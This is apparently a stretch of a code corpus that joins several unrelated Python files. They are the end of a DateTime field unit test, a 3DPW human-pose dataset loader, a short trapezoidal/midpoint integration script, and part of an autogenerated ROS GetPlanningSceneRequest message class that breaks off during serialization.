        self.assertEqual(field.process(now_utc, OUTBOUND, True), now_text)
    def test_utc_processing(self):
        """With utc=True, inbound values come back UTC-aware."""
        field = DateTime(utc=True)
        self.assert_processed(field, None)
        self.assert_not_processed(field, 'invalid', True)
        now = datetime.utcnow().replace(microsecond=0)
        now_utc = now.replace(tzinfo=UTC)
        now_text = now_utc.strftime('%Y-%m-%dT%H:%M:%SZ')
        self.assertEqual(field.process(now_text, INBOUND, True), now_utc)
        self.assertEqual(field.process(now, OUTBOUND, True), now_text)
        self.assertEqual(field.process(now_utc, OUTBOUND, True), now_text)
    def test_minimum(self):
        """minimum accepts a datetime or its text form; earlier values fail."""
        now, now_text = construct_now()
        for field in (DateTime(minimum=now), DateTime(minimum=now_text)):
            self.assertEqual(field.minimum, now)
            self.assert_processed(field, (now, now_text), (now, now_text))
            self.assert_processed(field, (now, now_text), construct_now(+1))
            self.assert_not_processed(field, 'minimum', construct_now(-60))
    def test_maximum(self):
        """maximum accepts a datetime or its text form; later values fail."""
        now, now_text = construct_now()
        for field in (DateTime(maximum=now), DateTime(maximum=now_text)):
            self.assertEqual(field.maximum, now)
            self.assert_processed(field, (now, now_text), (now, now_text))
            self.assert_processed(field, (now, now_text), construct_now(-60))
            self.assert_not_processed(field, 'maximum', construct_now(+60))
    def test_interpolation(self):
        """${value} template interpolation yields the bound datetime."""
        field = DateTime()
        now = datetime.now()
        self.assert_interpolated(field, None, now)
        self.assert_interpolated(field, ('${value}', now), value=now)
    def test_description(self):
        """describe() reports fieldtype, name, utc flag and any bounds."""
        now_text = '2012-01-01T00:00:00Z'
        field = DateTime(name='test', utc=True, minimum=now_text)
        self.assertEqual(field.describe(), {'fieldtype': 'datetime', 'name': 'test',
            'minimum': now_text, 'utc': True})
        field = DateTime(name='test', utc=True, maximum=now_text)
        self.assertEqual(field.describe(), {'fieldtype': 'datetime', 'name': 'test',
            'maximum': now_text, 'utc': True})
        field = DateTime(name='test', utc=True, minimum=now_text, maximum=now_text)
        self.assertEqual(field.describe(), {'fieldtype': 'datetime', 'name': 'test',
            'minimum': now_text, 'maximum': now_text, 'utc': True})
|
5,192 | cf6dffb28e37003212d3e3402dee58a57a7d9869 | from __future__ import print_function, absolute_import, division
import os
import h5py
import glob
import copy
import numpy as np
from tqdm import tqdm
# from utils.pose import draw_skeleton
from matplotlib import pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import poseutils.camera_utils as cameras
from poseutils.view import draw_skeleton
from poseutils.props import get_body_centered_axes
from poseutils.transform import normalize_skeleton
from poseutils.transform import normalize_zscore
# Skeleton topology over the 16 source joints; presumably parent indices
# with -1 marking the root -- confirm against the upstream joint layout.
parents = [-1, 0, 1, 2, 0, 4, 5, 0, 7, 8, 8, 10, 11, 8, 13, 14]
joints_left = [4, 5, 6, 10, 11, 12]
joints_right = [1, 2, 3, 13, 14, 15]
# Left/right (and centre) joint pairs grouped for the 14-joint skeleton.
skeleton_3DPW_joints_group = [[2, 3], [5, 6], [1, 4], [0, 7], [12, 13], [9, 10], [8, 11]]
# Human-readable names for the 14 selected joints (Spine2/Head dropped,
# see the commented entries below).
NAMES_3DPW = ['']*14
NAMES_3DPW[0] = 'Hip'
NAMES_3DPW[1] = 'RHip'
NAMES_3DPW[2] = 'RKnee'
NAMES_3DPW[3] = 'RAnkle'
NAMES_3DPW[4] = 'LHip'
NAMES_3DPW[5] = 'LKnee'
NAMES_3DPW[6] = 'LAnkle'
# NAMES_3DPW[7] = 'Spine2'
NAMES_3DPW[7] = 'Neck'
# NAMES_3DPW[8] = 'Head'
NAMES_3DPW[8] = 'LUpperArm'
NAMES_3DPW[9] = 'LElbow'
NAMES_3DPW[10] = 'LWrist'
NAMES_3DPW[11] = 'RUpperArm'
NAMES_3DPW[12] = 'RElbow'
NAMES_3DPW[13] = 'RWrist'
# Human3.6m IDs for training and testing
TRAIN_SUBJECTS = ['S0']
TEST_SUBJECTS = ['S0']
class TDPWDataset(object):
    """Loader for a preprocessed 3DPW pose dataset (14-joint skeletons).

    Reads 2D/3D keypoints from an .npz, root-centres the 3D poses,
    optionally centres or skeleton-normalizes the 2D poses, and z-score
    normalizes both splits using statistics from the training split only.
    """
    def __init__(self, path, center_2d=False, load_metrics=None, skel_norm=False):
        # TODO: Update the fps here if needed
        super(TDPWDataset, self).__init__()
        # TODO: Update camera later if needed
        self.cameras = None
        self._data_train = { "2d": np.zeros((0, 14, 2), dtype=np.float32), "3d": np.zeros((0, 14, 3), dtype=np.float32), "axes": [] }
        self._data_valid = { "2d": np.zeros((0, 14, 2), dtype=np.float32), "3d": np.zeros((0, 14, 3), dtype=np.float32), "axes": [] }
        self.mean_2d = 0.0
        self.std_2d = 0.0
        self.mean_3d = 0.0
        self.std_3d = 0.0
        self.center_2d = center_2d
        self.skel_norm = skel_norm
        self.cameras = []
        # NOTE(review): load_metrics is accepted here (and in load_data)
        # but never used -- confirm whether it can be retired.
        self.load_data(path)
    def load_data(self, path, load_metrics=None):
        """Read the .npz at *path* and populate/normalize both splits."""
        # Source joints kept for the 14-joint skeleton.
        indices_to_select = [0, 2, 5, 8, 1, 4, 7, 12, 16, 18, 20, 17, 19, 21]
        data = np.load(path, allow_pickle=True, encoding='latin1')['data'].item()
        data_train = data['train']
        data_valid = data['test']
        self._data_train['2d'] = data_train["combined_2d"][:, indices_to_select, :]
        self._data_train['3d'] = data_train["combined_3d_cam"][:, indices_to_select, :]*1000
        self._data_valid['2d'] = data_valid["combined_2d"][:, indices_to_select, :]
        self._data_valid['3d'] = data_valid["combined_3d_cam"][:, indices_to_select, :]*1000
        # Root-centre the 3D poses (joint 0 becomes the origin).
        self._data_train['3d'] -= self._data_train['3d'][:, :1, :]
        self._data_valid['3d'] -= self._data_valid['3d'][:, :1, :]
        if self.center_2d:
            self._data_train['2d'] -= self._data_train['2d'][:, :1, :]
            self._data_valid['2d'] -= self._data_valid['2d'][:, :1, :]
        _, _, _, self._data_train['axes'] = get_body_centered_axes(self._data_train['3d'])
        _, _, _, self._data_valid['axes'] = get_body_centered_axes(self._data_valid['3d'])
        if self.skel_norm:
            self._data_train['2d'] = normalize_skeleton(self._data_train['2d'])
            self._data_valid['2d'] = normalize_skeleton(self._data_valid['2d'])
        # Z-score both splits with TRAINING statistics (no validation leakage).
        self.mean_3d = np.mean(self._data_train['3d'], axis=0)
        self.std_3d = np.std(self._data_train['3d'], axis=0)
        self._data_train['3d'] = normalize_zscore(self._data_train['3d'], self.mean_3d, self.std_3d, skip_root=True)
        self._data_valid['3d'] = normalize_zscore(self._data_valid['3d'], self.mean_3d, self.std_3d, skip_root=True)
        if not self.skel_norm:
            self.mean_2d = np.mean(self._data_train['2d'], axis=0)
            self.std_2d = np.std(self._data_train['2d'], axis=0)
            self._data_train['2d'] = normalize_zscore(self._data_train['2d'], self.mean_2d, self.std_2d, skip_root=self.center_2d)
            self._data_valid['2d'] = normalize_zscore(self._data_valid['2d'], self.mean_2d, self.std_2d, skip_root=self.center_2d)
    def define_actions(self, action=None):
        """Return all action labels, or validate and wrap a single one."""
        all_actions = ["N"]
        if action is None:
            return all_actions
        if action not in all_actions:
            # FIX: `raise (ValueError, "...")` raised a tuple, which is a
            # TypeError under Python 3; raise the exception instance instead.
            raise ValueError("Undefined action: {}".format(action))
        return [action]
    def get_2d_valid(self):
        """Validation 2D poses as a one-element list of (N, 14, 2) arrays."""
        return [self._data_valid['2d'].reshape((-1, 14, 2))]
    def get_3d_valid(self):
        """Validation 3D poses as a one-element list of (N, 14, 3) arrays."""
        return [self._data_valid['3d'].reshape((-1, 14, 3))]
    def get_2d_train(self):
        """Training 2D poses as a one-element list of (N, 14, 2) arrays."""
        return [self._data_train['2d'].reshape((-1, 14, 2))]
    def get_3d_train(self):
        """Training 3D poses as a one-element list of (N, 14, 3) arrays."""
        return [self._data_train['3d'].reshape((-1, 14, 3))]
    def get_axes_train(self):
        """First two components of the training body-centred axes."""
        return [self._data_train['axes'][:, :, :2]]
    def get_axes_valid(self):
        """First two components of the validation body-centred axes."""
        return [self._data_valid['axes'][:, :, :2]]
    def get_joints_group(self):
        """Left/right joint grouping used by downstream evaluation."""
        return skeleton_3DPW_joints_group
    def plot_random(self):
        """Debug helper: plot one random training pose in 3D and 2D."""
        idx = np.random.randint(0, high=self._data_train['3d'].shape[0])
        fig = plt.figure(figsize=(12, 6))
        ax = fig.add_subplot(121, projection='3d')
        bx = fig.add_subplot(122)
        draw_skeleton(self._data_train['3d'][idx, :, :]/1000, ax)
        draw_skeleton(self._data_train['2d'][idx, :, :], bx)
        ax.set_xlabel("X")
        ax.set_ylabel("Y")
        ax.set_zlabel("Z")
        ax.set_xlim((-1, 1))
        ax.set_ylim((-1, 1))
        ax.set_zlim((-1, 1))
        bx.set_xlim((-960, 960))
        bx.set_ylim((960, -960))
        plt.show()
5,193 | d99278c8f539322fd83ae5459c3121effc044b88 | from trapezoidal import trapezoidal
from midpoint import midpoint
from math import pi, sin
def integrate_sine(f, a, b, n = 2):
    """Approximate the integral of *f* over [a, b] with n subintervals.

    Returns an (I_trapezoidal, I_midpoint) tuple so the two rules can be
    compared; the original discarded both results and returned None, and
    called midpoint() with no arguments (a TypeError at runtime).
    """
    I_t = trapezoidal(f, a, b, n)
    # NOTE(review): assumes midpoint shares trapezoidal's (f, a, b, n)
    # signature -- confirm against midpoint.py.
    I_m = midpoint(f, a, b, n)
    return I_t, I_m
# Example problem: integrate sin(x) over [0, pi]; the exact value is 2.
a = 0.0; b = pi
f = lambda x: sin(x)
5,194 | b8e18877af990c533c642d4937354198a4676419 | """autogenerated by genpy from arm_navigation_msgs/GetPlanningSceneRequest.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import arm_navigation_msgs.msg
import geometry_msgs.msg
import std_msgs.msg
import genpy
import sensor_msgs.msg
class GetPlanningSceneRequest(genpy.Message):
_md5sum = "67ad55e9bed9c8f21dfb4b9b1ca8df7d"
_type = "arm_navigation_msgs/GetPlanningSceneRequest"
_has_header = False #flag to mark the presence of a Header object
_full_text = """
PlanningScene planning_scene_diff
arm_navigation_msgs/OrderedCollisionOperations operations
================================================================================
MSG: arm_navigation_msgs/PlanningScene
#full robot state
arm_navigation_msgs/RobotState robot_state
#additional frames for duplicating tf
geometry_msgs/TransformStamped[] fixed_frame_transforms
#full allowed collision matrix
AllowedCollisionMatrix allowed_collision_matrix
#allowed contacts
arm_navigation_msgs/AllowedContactSpecification[] allowed_contacts
#all link paddings
arm_navigation_msgs/LinkPadding[] link_padding
#collision objects
arm_navigation_msgs/CollisionObject[] collision_objects
arm_navigation_msgs/AttachedCollisionObject[] attached_collision_objects
#the collision map
arm_navigation_msgs/CollisionMap collision_map
================================================================================
MSG: arm_navigation_msgs/RobotState
# This message contains information about the robot state, i.e. the positions of its joints and links
sensor_msgs/JointState joint_state
arm_navigation_msgs/MultiDOFJointState multi_dof_joint_state
================================================================================
MSG: sensor_msgs/JointState
# This is a message that holds data to describe the state of a set of torque controlled joints.
#
# The state of each joint (revolute or prismatic) is defined by:
# * the position of the joint (rad or m),
# * the velocity of the joint (rad/s or m/s) and
# * the effort that is applied in the joint (Nm or N).
#
# Each joint is uniquely identified by its name
# The header specifies the time at which the joint states were recorded. All the joint states
# in one message have to be recorded at the same time.
#
# This message consists of a multiple arrays, one for each part of the joint state.
# The goal is to make each of the fields optional. When e.g. your joints have no
# effort associated with them, you can leave the effort array empty.
#
# All arrays in this message should have the same size, or be empty.
# This is the only way to uniquely associate the joint name with the correct
# states.
Header header
string[] name
float64[] position
float64[] velocity
float64[] effort
================================================================================
MSG: std_msgs/Header
# Standard metadata for higher-level stamped data types.
# This is generally used to communicate timestamped data
# in a particular coordinate frame.
#
# sequence ID: consecutively increasing ID
uint32 seq
#Two-integer timestamp that is expressed as:
# * stamp.secs: seconds (stamp_secs) since epoch
# * stamp.nsecs: nanoseconds since stamp_secs
# time-handling sugar is provided by the client library
time stamp
#Frame this data is associated with
# 0: no frame
# 1: global frame
string frame_id
================================================================================
MSG: arm_navigation_msgs/MultiDOFJointState
#A representation of a multi-dof joint state
time stamp
string[] joint_names
string[] frame_ids
string[] child_frame_ids
geometry_msgs/Pose[] poses
================================================================================
MSG: geometry_msgs/Pose
# A representation of pose in free space, composed of postion and orientation.
Point position
Quaternion orientation
================================================================================
MSG: geometry_msgs/Point
# This contains the position of a point in free space
float64 x
float64 y
float64 z
================================================================================
MSG: geometry_msgs/Quaternion
# This represents an orientation in free space in quaternion form.
float64 x
float64 y
float64 z
float64 w
================================================================================
MSG: geometry_msgs/TransformStamped
# This expresses a transform from coordinate frame header.frame_id
# to the coordinate frame child_frame_id
#
# This message is mostly used by the
# <a href="http://www.ros.org/wiki/tf">tf</a> package.
# See it's documentation for more information.
Header header
string child_frame_id # the frame id of the child frame
Transform transform
================================================================================
MSG: geometry_msgs/Transform
# This represents the transform between two coordinate frames in free space.
Vector3 translation
Quaternion rotation
================================================================================
MSG: geometry_msgs/Vector3
# This represents a vector in free space.
float64 x
float64 y
float64 z
================================================================================
MSG: arm_navigation_msgs/AllowedCollisionMatrix
# the list of link names in the matrix
string[] link_names
# the individual entries in the allowed collision matrix
# symmetric, with same order as link_names
AllowedCollisionEntry[] entries
================================================================================
MSG: arm_navigation_msgs/AllowedCollisionEntry
# whether or not collision checking is enabled
bool[] enabled
================================================================================
MSG: arm_navigation_msgs/AllowedContactSpecification
# The names of the regions
string name
# The shape of the region in the environment
arm_navigation_msgs/Shape shape
# The pose of the space defining the region
geometry_msgs/PoseStamped pose_stamped
# The set of links that will be allowed to have penetration contact within this region
string[] link_names
# The maximum penetration depth allowed for every link
float64 penetration_depth
================================================================================
MSG: arm_navigation_msgs/Shape
byte SPHERE=0
byte BOX=1
byte CYLINDER=2
byte MESH=3
byte type
#### define sphere, box, cylinder ####
# the origin of each shape is considered at the shape's center
# for sphere
# radius := dimensions[0]
# for cylinder
# radius := dimensions[0]
# length := dimensions[1]
# the length is along the Z axis
# for box
# size_x := dimensions[0]
# size_y := dimensions[1]
# size_z := dimensions[2]
float64[] dimensions
#### define mesh ####
# list of triangles; triangle k is defined by tre vertices located
# at indices triangles[3k], triangles[3k+1], triangles[3k+2]
int32[] triangles
geometry_msgs/Point[] vertices
================================================================================
MSG: geometry_msgs/PoseStamped
# A Pose with reference coordinate frame and timestamp
Header header
Pose pose
================================================================================
MSG: arm_navigation_msgs/LinkPadding
#name for the link
string link_name
# padding to apply to the link
float64 padding
================================================================================
MSG: arm_navigation_msgs/CollisionObject
# a header, used for interpreting the poses
Header header
# the id of the object
string id
# The padding used for filtering points near the object.
# This does not affect collision checking for the object.
# Set to negative to get zero padding.
float32 padding
#This contains what is to be done with the object
CollisionObjectOperation operation
#the shapes associated with the object
arm_navigation_msgs/Shape[] shapes
#the poses associated with the shapes - will be transformed using the header
geometry_msgs/Pose[] poses
================================================================================
MSG: arm_navigation_msgs/CollisionObjectOperation
#Puts the object into the environment
#or updates the object if already added
byte ADD=0
#Removes the object from the environment entirely
byte REMOVE=1
#Only valid within the context of a CollisionAttachedObject message
#Will be ignored if sent with an CollisionObject message
#Takes an attached object, detaches from the attached link
#But adds back in as regular object
byte DETACH_AND_ADD_AS_OBJECT=2
#Only valid within the context of a CollisionAttachedObject message
#Will be ignored if sent with an CollisionObject message
#Takes current object in the environment and removes it as
#a regular object
byte ATTACH_AND_REMOVE_AS_OBJECT=3
# Byte code for operation
byte operation
================================================================================
MSG: arm_navigation_msgs/AttachedCollisionObject
# The CollisionObject will be attached with a fixed joint to this link
# If link name is set to REMOVE_ALL_ATTACHED_OBJECTS and object.operation
# is set to REMOVE will remove all attached bodies attached to any object
string link_name
#Reserved for indicating that all attached objects should be removed
string REMOVE_ALL_ATTACHED_OBJECTS = "all"
#This contains the actual shapes and poses for the CollisionObject
#to be attached to the link
#If action is remove and no object.id is set, all objects
#attached to the link indicated by link_name will be removed
CollisionObject object
# The set of links that the attached objects are allowed to touch
# by default - the link_name is included by default
string[] touch_links
================================================================================
MSG: arm_navigation_msgs/CollisionMap
#header for interpreting box positions
Header header
#boxes for use in collision testing
OrientedBoundingBox[] boxes
================================================================================
MSG: arm_navigation_msgs/OrientedBoundingBox
#the center of the box
geometry_msgs/Point32 center
#the extents of the box, assuming the center is at the point
geometry_msgs/Point32 extents
#the axis of the box
geometry_msgs/Point32 axis
#the angle of rotation around the axis
float32 angle
================================================================================
MSG: geometry_msgs/Point32
# This contains the position of a point in free space(with 32 bits of precision).
# It is recommeded to use Point wherever possible instead of Point32.
#
# This recommendation is to promote interoperability.
#
# This message is designed to take up less space when sending
# lots of points at once, as in the case of a PointCloud.
float32 x
float32 y
float32 z
================================================================================
MSG: arm_navigation_msgs/OrderedCollisionOperations
# A set of collision operations that will be performed in the order they are specified
CollisionOperation[] collision_operations
================================================================================
MSG: arm_navigation_msgs/CollisionOperation
# A definition of a collision operation
# E.g. ("gripper",COLLISION_SET_ALL,ENABLE) will enable collisions
# between the gripper and all objects in the collision space
string object1
string object2
string COLLISION_SET_ALL="all"
string COLLISION_SET_OBJECTS="objects"
string COLLISION_SET_ATTACHED_OBJECTS="attached"
# The penetration distance to which collisions are allowed. This is 0.0 by default.
float64 penetration_distance
# Flag that determines whether collisions will be enabled or disabled for the pair of objects specified above
int32 operation
int32 DISABLE=0
int32 ENABLE=1
"""
__slots__ = ['planning_scene_diff','operations']
_slot_types = ['arm_navigation_msgs/PlanningScene','arm_navigation_msgs/OrderedCollisionOperations']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
planning_scene_diff,operations
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(GetPlanningSceneRequest, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.planning_scene_diff is None:
self.planning_scene_diff = arm_navigation_msgs.msg.PlanningScene()
if self.operations is None:
self.operations = arm_navigation_msgs.msg.OrderedCollisionOperations()
else:
self.planning_scene_diff = arm_navigation_msgs.msg.PlanningScene()
self.operations = arm_navigation_msgs.msg.OrderedCollisionOperations()
def _get_types(self):
"""
internal API method
"""
return self._slot_types
  def serialize(self, buff):
    """
    serialize message into buffer

    Writes every field of this request in wire order: variable-length
    fields are prefixed with a little-endian uint32 count; strings are
    UTF-8 encoded before their length prefix is computed.
    :param buff: buffer, ``StringIO``
    """
    try:
      # --- planning_scene_diff.robot_state.joint_state ---
      _x = self
      buff.write(_struct_3I.pack(_x.planning_scene_diff.robot_state.joint_state.header.seq, _x.planning_scene_diff.robot_state.joint_state.header.stamp.secs, _x.planning_scene_diff.robot_state.joint_state.header.stamp.nsecs))
      _x = self.planning_scene_diff.robot_state.joint_state.header.frame_id
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      length = len(self.planning_scene_diff.robot_state.joint_state.name)
      buff.write(_struct_I.pack(length))
      for val1 in self.planning_scene_diff.robot_state.joint_state.name:
        length = len(val1)
        if python3 or type(val1) == unicode:
          val1 = val1.encode('utf-8')
          length = len(val1)
        buff.write(struct.pack('<I%ss'%length, length, val1))
      length = len(self.planning_scene_diff.robot_state.joint_state.position)
      buff.write(_struct_I.pack(length))
      pattern = '<%sd'%length
      buff.write(struct.pack(pattern, *self.planning_scene_diff.robot_state.joint_state.position))
      length = len(self.planning_scene_diff.robot_state.joint_state.velocity)
      buff.write(_struct_I.pack(length))
      pattern = '<%sd'%length
      buff.write(struct.pack(pattern, *self.planning_scene_diff.robot_state.joint_state.velocity))
      length = len(self.planning_scene_diff.robot_state.joint_state.effort)
      buff.write(_struct_I.pack(length))
      pattern = '<%sd'%length
      buff.write(struct.pack(pattern, *self.planning_scene_diff.robot_state.joint_state.effort))
      # --- planning_scene_diff.robot_state.multi_dof_joint_state ---
      _x = self
      buff.write(_struct_2I.pack(_x.planning_scene_diff.robot_state.multi_dof_joint_state.stamp.secs, _x.planning_scene_diff.robot_state.multi_dof_joint_state.stamp.nsecs))
      length = len(self.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names)
      buff.write(_struct_I.pack(length))
      for val1 in self.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names:
        length = len(val1)
        if python3 or type(val1) == unicode:
          val1 = val1.encode('utf-8')
          length = len(val1)
        buff.write(struct.pack('<I%ss'%length, length, val1))
      length = len(self.planning_scene_diff.robot_state.multi_dof_joint_state.frame_ids)
      buff.write(_struct_I.pack(length))
      for val1 in self.planning_scene_diff.robot_state.multi_dof_joint_state.frame_ids:
        length = len(val1)
        if python3 or type(val1) == unicode:
          val1 = val1.encode('utf-8')
          length = len(val1)
        buff.write(struct.pack('<I%ss'%length, length, val1))
      length = len(self.planning_scene_diff.robot_state.multi_dof_joint_state.child_frame_ids)
      buff.write(_struct_I.pack(length))
      for val1 in self.planning_scene_diff.robot_state.multi_dof_joint_state.child_frame_ids:
        length = len(val1)
        if python3 or type(val1) == unicode:
          val1 = val1.encode('utf-8')
          length = len(val1)
        buff.write(struct.pack('<I%ss'%length, length, val1))
      length = len(self.planning_scene_diff.robot_state.multi_dof_joint_state.poses)
      buff.write(_struct_I.pack(length))
      for val1 in self.planning_scene_diff.robot_state.multi_dof_joint_state.poses:
        _v1 = val1.position
        _x = _v1
        buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
        _v2 = val1.orientation
        _x = _v2
        buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
      # --- planning_scene_diff.fixed_frame_transforms (TransformStamped[]) ---
      length = len(self.planning_scene_diff.fixed_frame_transforms)
      buff.write(_struct_I.pack(length))
      for val1 in self.planning_scene_diff.fixed_frame_transforms:
        _v3 = val1.header
        buff.write(_struct_I.pack(_v3.seq))
        _v4 = _v3.stamp
        _x = _v4
        buff.write(_struct_2I.pack(_x.secs, _x.nsecs))
        _x = _v3.frame_id
        length = len(_x)
        if python3 or type(_x) == unicode:
          _x = _x.encode('utf-8')
          length = len(_x)
        buff.write(struct.pack('<I%ss'%length, length, _x))
        _x = val1.child_frame_id
        length = len(_x)
        if python3 or type(_x) == unicode:
          _x = _x.encode('utf-8')
          length = len(_x)
        buff.write(struct.pack('<I%ss'%length, length, _x))
        _v5 = val1.transform
        _v6 = _v5.translation
        _x = _v6
        buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
        _v7 = _v5.rotation
        _x = _v7
        buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
      # --- planning_scene_diff.allowed_collision_matrix ---
      length = len(self.planning_scene_diff.allowed_collision_matrix.link_names)
      buff.write(_struct_I.pack(length))
      for val1 in self.planning_scene_diff.allowed_collision_matrix.link_names:
        length = len(val1)
        if python3 or type(val1) == unicode:
          val1 = val1.encode('utf-8')
          length = len(val1)
        buff.write(struct.pack('<I%ss'%length, length, val1))
      length = len(self.planning_scene_diff.allowed_collision_matrix.entries)
      buff.write(_struct_I.pack(length))
      for val1 in self.planning_scene_diff.allowed_collision_matrix.entries:
        length = len(val1.enabled)
        buff.write(_struct_I.pack(length))
        pattern = '<%sB'%length
        buff.write(struct.pack(pattern, *val1.enabled))
      # --- planning_scene_diff.allowed_contacts ---
      length = len(self.planning_scene_diff.allowed_contacts)
      buff.write(_struct_I.pack(length))
      for val1 in self.planning_scene_diff.allowed_contacts:
        _x = val1.name
        length = len(_x)
        if python3 or type(_x) == unicode:
          _x = _x.encode('utf-8')
          length = len(_x)
        buff.write(struct.pack('<I%ss'%length, length, _x))
        _v8 = val1.shape
        buff.write(_struct_b.pack(_v8.type))
        length = len(_v8.dimensions)
        buff.write(_struct_I.pack(length))
        pattern = '<%sd'%length
        buff.write(struct.pack(pattern, *_v8.dimensions))
        length = len(_v8.triangles)
        buff.write(_struct_I.pack(length))
        pattern = '<%si'%length
        buff.write(struct.pack(pattern, *_v8.triangles))
        length = len(_v8.vertices)
        buff.write(_struct_I.pack(length))
        for val3 in _v8.vertices:
          _x = val3
          buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
        _v9 = val1.pose_stamped
        _v10 = _v9.header
        buff.write(_struct_I.pack(_v10.seq))
        _v11 = _v10.stamp
        _x = _v11
        buff.write(_struct_2I.pack(_x.secs, _x.nsecs))
        _x = _v10.frame_id
        length = len(_x)
        if python3 or type(_x) == unicode:
          _x = _x.encode('utf-8')
          length = len(_x)
        buff.write(struct.pack('<I%ss'%length, length, _x))
        _v12 = _v9.pose
        _v13 = _v12.position
        _x = _v13
        buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
        _v14 = _v12.orientation
        _x = _v14
        buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
        length = len(val1.link_names)
        buff.write(_struct_I.pack(length))
        for val2 in val1.link_names:
          length = len(val2)
          if python3 or type(val2) == unicode:
            val2 = val2.encode('utf-8')
            length = len(val2)
          buff.write(struct.pack('<I%ss'%length, length, val2))
        buff.write(_struct_d.pack(val1.penetration_depth))
      # --- planning_scene_diff.link_padding ---
      length = len(self.planning_scene_diff.link_padding)
      buff.write(_struct_I.pack(length))
      for val1 in self.planning_scene_diff.link_padding:
        _x = val1.link_name
        length = len(_x)
        if python3 or type(_x) == unicode:
          _x = _x.encode('utf-8')
          length = len(_x)
        buff.write(struct.pack('<I%ss'%length, length, _x))
        buff.write(_struct_d.pack(val1.padding))
      # --- planning_scene_diff.collision_objects ---
      length = len(self.planning_scene_diff.collision_objects)
      buff.write(_struct_I.pack(length))
      for val1 in self.planning_scene_diff.collision_objects:
        _v15 = val1.header
        buff.write(_struct_I.pack(_v15.seq))
        _v16 = _v15.stamp
        _x = _v16
        buff.write(_struct_2I.pack(_x.secs, _x.nsecs))
        _x = _v15.frame_id
        length = len(_x)
        if python3 or type(_x) == unicode:
          _x = _x.encode('utf-8')
          length = len(_x)
        buff.write(struct.pack('<I%ss'%length, length, _x))
        _x = val1.id
        length = len(_x)
        if python3 or type(_x) == unicode:
          _x = _x.encode('utf-8')
          length = len(_x)
        buff.write(struct.pack('<I%ss'%length, length, _x))
        buff.write(_struct_f.pack(val1.padding))
        _v17 = val1.operation
        buff.write(_struct_b.pack(_v17.operation))
        length = len(val1.shapes)
        buff.write(_struct_I.pack(length))
        for val2 in val1.shapes:
          buff.write(_struct_b.pack(val2.type))
          length = len(val2.dimensions)
          buff.write(_struct_I.pack(length))
          pattern = '<%sd'%length
          buff.write(struct.pack(pattern, *val2.dimensions))
          length = len(val2.triangles)
          buff.write(_struct_I.pack(length))
          pattern = '<%si'%length
          buff.write(struct.pack(pattern, *val2.triangles))
          length = len(val2.vertices)
          buff.write(_struct_I.pack(length))
          for val3 in val2.vertices:
            _x = val3
            buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
        length = len(val1.poses)
        buff.write(_struct_I.pack(length))
        for val2 in val1.poses:
          _v18 = val2.position
          _x = _v18
          buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
          _v19 = val2.orientation
          _x = _v19
          buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
      # --- planning_scene_diff.attached_collision_objects ---
      length = len(self.planning_scene_diff.attached_collision_objects)
      buff.write(_struct_I.pack(length))
      for val1 in self.planning_scene_diff.attached_collision_objects:
        _x = val1.link_name
        length = len(_x)
        if python3 or type(_x) == unicode:
          _x = _x.encode('utf-8')
          length = len(_x)
        buff.write(struct.pack('<I%ss'%length, length, _x))
        _v20 = val1.object
        _v21 = _v20.header
        buff.write(_struct_I.pack(_v21.seq))
        _v22 = _v21.stamp
        _x = _v22
        buff.write(_struct_2I.pack(_x.secs, _x.nsecs))
        _x = _v21.frame_id
        length = len(_x)
        if python3 or type(_x) == unicode:
          _x = _x.encode('utf-8')
          length = len(_x)
        buff.write(struct.pack('<I%ss'%length, length, _x))
        _x = _v20.id
        length = len(_x)
        if python3 or type(_x) == unicode:
          _x = _x.encode('utf-8')
          length = len(_x)
        buff.write(struct.pack('<I%ss'%length, length, _x))
        buff.write(_struct_f.pack(_v20.padding))
        _v23 = _v20.operation
        buff.write(_struct_b.pack(_v23.operation))
        length = len(_v20.shapes)
        buff.write(_struct_I.pack(length))
        for val3 in _v20.shapes:
          buff.write(_struct_b.pack(val3.type))
          length = len(val3.dimensions)
          buff.write(_struct_I.pack(length))
          pattern = '<%sd'%length
          buff.write(struct.pack(pattern, *val3.dimensions))
          length = len(val3.triangles)
          buff.write(_struct_I.pack(length))
          pattern = '<%si'%length
          buff.write(struct.pack(pattern, *val3.triangles))
          length = len(val3.vertices)
          buff.write(_struct_I.pack(length))
          for val4 in val3.vertices:
            _x = val4
            buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
        length = len(_v20.poses)
        buff.write(_struct_I.pack(length))
        for val3 in _v20.poses:
          _v24 = val3.position
          _x = _v24
          buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
          _v25 = val3.orientation
          _x = _v25
          buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
        length = len(val1.touch_links)
        buff.write(_struct_I.pack(length))
        for val2 in val1.touch_links:
          length = len(val2)
          if python3 or type(val2) == unicode:
            val2 = val2.encode('utf-8')
            length = len(val2)
          buff.write(struct.pack('<I%ss'%length, length, val2))
      # --- planning_scene_diff.collision_map ---
      _x = self
      buff.write(_struct_3I.pack(_x.planning_scene_diff.collision_map.header.seq, _x.planning_scene_diff.collision_map.header.stamp.secs, _x.planning_scene_diff.collision_map.header.stamp.nsecs))
      _x = self.planning_scene_diff.collision_map.header.frame_id
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
